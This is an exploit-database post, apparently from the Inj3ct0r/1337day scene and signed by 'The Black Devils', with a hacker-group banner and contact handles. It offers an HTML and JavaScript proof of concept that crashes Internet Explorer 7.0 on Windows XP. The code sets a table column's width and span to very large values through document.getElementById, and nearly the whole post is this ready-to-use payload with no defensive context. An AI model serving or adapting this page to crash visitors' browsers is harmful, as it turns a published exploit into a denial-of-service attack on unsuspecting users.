#0     _                   __           __       __                     1 #1   /' \            __  /'__`\        /\ \__  /'__`\                   0 #0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 #1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 #0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 #1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 #0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 #1                  \ \____/ >> Exploit database separated by exploit   0 #0                   \/___/          type (local, remote, DoS, etc.)    1 #1                                                                      1 #0  [+] Site            : 1337day.com                                   0 #1  [+] Support e-mail  : submit[at]1337day.com                         1 #0                                                                      0 #1               #########################################              1 #0               I'm The Black Devils member from Inj3ct0r Team         1 #1               #########################################              0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # Exploit Title: Internet Explorer 7.0 "document.getElementById" DOS # Date: 31-08-2013 # Exploit Author: The Black Devils "Asesino04" # Vendor Homepage: http://windows.microsoft.com/fr-fr/internet-explorer/download-ie # Version: 7.0.5730.13 # Tested on: [ Windows XP SP3] ================================================================       <html>  <body>  <table style="table-layout:fixed" >         <col id="132" width="41" span="1" >  </col>  </table>  <script>     function over_trigger() {         var obj_col = document.getElementById("132");         obj_col.width = "42765";         obj_col.span = 1000;  }     setTimeout("over_trigger();",1);     </script>  </body>  </html> ================================================================        # Contact : #------------------ # Fane Page : www.facebook.com/Th3.Black.D3Vils # Youtube : www.youtube.com/user/Th3BlackDevils # Facebook : www.facebook.com/DevilsDz # Email : mr.k4rizma@gmail.com